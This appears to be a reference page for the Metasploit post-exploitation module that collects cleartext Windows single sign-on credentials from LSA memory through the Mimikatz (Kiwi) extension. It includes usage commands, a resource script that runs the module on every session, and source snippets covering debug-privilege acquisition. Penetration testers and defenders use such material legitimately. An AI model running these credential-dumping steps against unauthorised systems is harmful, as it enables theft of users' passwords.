Windows Single Sign On Credential Collector (Mimikatz) - Metasploit


This page contains detailed information about how to use the post/windows/gather/credentials/sso metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Windows Single Sign On Credential Collector (Mimikatz)
Module: post/windows/gather/credentials/sso
Source code: modules/post/windows/gather/credentials/sso.rb
Disclosure date: -
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module will collect cleartext Single Sign On credentials from the Local Security Authority using the Kiwi (Mimikatz) extension. Blank passwords will not be stored in the database.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/windows/gather/credentials/sso

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/windows/gather/credentials/sso
msf post(sso) > show options
    ... show and set options ...
msf post(sso) > set SESSION session-id
msf post(sso) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/windows/gather/credentials/sso")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options


  • SESSION: The session to run this module on.

Go back to menu.

Msfconsole Usage


Here is how the windows/gather/credentials/sso post exploitation module looks in the msfconsole:

msf6 > use post/windows/gather/credentials/sso

msf6 post(windows/gather/credentials/sso) > show info

       Name: Windows Single Sign On Credential Collector (Mimikatz)
     Module: post/windows/gather/credentials/sso
   Platform: Windows
       Arch: 
       Rank: Normal

Provided by:
  Ben Campbell <[email protected]>

Compatible session types:
  Meterpreter

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Description:
  This module will collect cleartext Single Sign On credentials from 
  the Local Security Authority using the Kiwi (Mimikatz) extension. 
  Blank passwords will not be stored in the database.

Module Options


This is a complete list of options available in the windows/gather/credentials/sso post exploitation module:

msf6 post(windows/gather/credentials/sso) > show options

Module options (post/windows/gather/credentials/sso):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Advanced Options


Here is a complete list of advanced options supported by the windows/gather/credentials/sso post exploitation module:

msf6 post(windows/gather/credentials/sso) > show advanced

Module advanced options (post/windows/gather/credentials/sso):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions


This is a list of all post exploitation actions which the windows/gather/credentials/sso module can do:

msf6 post(windows/gather/credentials/sso) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the windows/gather/credentials/sso post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(windows/gather/credentials/sso) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

This module is only available in a windows meterpreter session.


Here is a relevant code snippet related to the "This module is only available in a windows meterpreter session." error message:

27:	    )
28:	  end
29:	
30:	  def run
31:	    if sysinfo.nil?
32:	      print_error("This module is only available in a windows meterpreter session.")
33:	      return
34:	    end
35:	
36:	    print_status("Running module against #{sysinfo['Computer']}")
37:	

x64 platform requires x64 meterpreter and kiwi extension


Here is a relevant code snippet related to the "x64 platform requires x64 meterpreter and kiwi extension" error message:

34:	    end
35:	
36:	    print_status("Running module against #{sysinfo['Computer']}")
37:	
38:	    if session.arch == ARCH_X86 and sysinfo['Architecture'] == ARCH_X64
39:	      print_error("x64 platform requires x64 meterpreter and kiwi extension")
40:	      return
41:	    end
42:	
43:	    unless client.kiwi
44:	      vprint_status("Loading kiwi extension...")

This module is only available in a windows meterpreter session.


Here is a relevant code snippet related to the "This module is only available in a windows meterpreter session." error message:

43:	    unless client.kiwi
44:	      vprint_status("Loading kiwi extension...")
45:	      begin
46:	        client.core.use("kiwi")
47:	      rescue Errno::ENOENT
48:	        print_error("This module is only available in a windows meterpreter session.")
49:	        return
50:	      end
51:	    end
52:	
53:	    unless is_system?

Not running as SYSTEM


Here is a relevant code snippet related to the "Not running as SYSTEM" error message:

49:	        return
50:	      end
51:	    end
52:	
53:	    unless is_system?
54:	      vprint_warning("Not running as SYSTEM")
55:	      unless client.kiwi.get_debug_privilege
56:	        print_error("Unable to get Debug privilege")
57:	        return
58:	      end
59:	      vprint_status("Retrieved Debug privilege")

Unable to get Debug privilege


Here is a relevant code snippet related to the "Unable to get Debug privilege" error message:

51:	    end
52:	
53:	    unless is_system?
54:	      vprint_warning("Not running as SYSTEM")
55:	      unless client.kiwi.get_debug_privilege
56:	        print_error("Unable to get Debug privilege")
57:	        return
58:	      end
59:	      vprint_status("Retrieved Debug privilege")
60:	    end
61:	

No LiveSSP credentials found.n


Here is a relevant code snippet related to the "No LiveSSP credentials found.n" error message:

88:	        livessp_found = true if package == :livessp
89:	      end
90:	    end
91:	
92:	    print_line(table.to_s)
93:	    print_error("No LiveSSP credentials found.\n") unless livessp_found
94:	  end
95:	
96:	  def report_creds(domain, user, pass)
97:	    return if (user.empty? or pass.empty?)
98:	    return if pass.include?("n.a.")

Go back to menu.


Go back to menu.

See Also


Check also the following modules related to this module:

Authors


  • Ben Campbell

Version


This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.